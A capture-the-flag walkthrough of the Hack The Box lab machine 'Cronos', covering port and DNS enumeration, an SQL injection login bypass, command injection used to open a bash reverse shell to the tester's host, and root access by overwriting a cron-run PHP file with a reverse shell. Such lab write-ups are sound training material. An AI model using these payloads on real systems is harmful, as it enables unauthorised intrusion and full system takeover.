Cronos

Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.

As always, we start with an all port nmap scan: nmap -p – 10.10.10.13

Pretty standard, so let’s see if we can determine versions and see if we have any scripts available: nmap -p 22,53,80 -sC -sV 10.10.10.13

So we have a website running Apache, let’s bring up Firefox and check it out.

Let’s see if we can do some enumeration with Dirbuster: gobuster dir -u http://10.10.10.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

After letting that run for a bit nothing exciting came up:

Now let’s try some DNS Enumeration: host -l cronos.htb 10.10.10.13

Excellent, there’s two sub domains: admin.cronos.htb and www.cronos.htb. Let’s update our /etc/hosts file with this information.

Once we save that file we can bring up our web browser and navigate to http://admin.cronos.htb and we see that we get a login page.

I initially tried several SQL injection payloads here at first. One finally worked: ‘or’1’=’1’;– – and I put it in both the username and password field. This page is a great starting point for different SQL injection payloads: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass

So playing with this it looks like it’s a tool for code execution. You sometimes see these in web pages for tech products like firewalls and stuff.

Let’s try running something else, like ls; ls -la

The fact that we can stack commands with a ; is awesome (though bad for the user). We can utilize this to get a shell on our target: ; /bin/bash -c “/bin/bash -i >& /dev/tcp/10.10.14.18/8080 0>&1”

So once we setup our NetCat listener and then run the shell above…we should have a shell

Enumeration – LinEnum.sh

We’re going to Enumerate with LinEnum.sh, which we can get from here: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

We’ll use WGET to download it: wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

And then we’ll use the Python SimpleHTTPServer to transfer it over to our target machine:

And then we’ll execute it with bash LinEnum.sh -t

There’s a lot to go through here, but one thing that’s always worth looking at is the Crontabs (hint due to the box name?).

We see that we have a cronjob at the bottom run every minute of every day as root (last line in the cron jobs). It looks like the path is /var/www/laravel/artisan

Let’s start by catting this file: cat /var/www/laravel/artisan

So it looks like the file that’s used for the cron job is a php file. This should make it easy for us to use the php reverse shell from PenTest Monkey: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Let’s download this to our Kali box and then update it with our Kali machine IP and port we’re going to listen on:

Now, since we already have our SimpleHTTPServer up, we should be able to just wget it: wget php-reverse-shell.php

Move the file to the /var/www/laravel/artisan directory (and thus overwriting the current one): mv php-reverse-shell.php /var/www/laravel/artisan

Quickly setup your NetCat listener, and wait:

A quick whoami reveals root, and you can navigate to /root to get the root flat.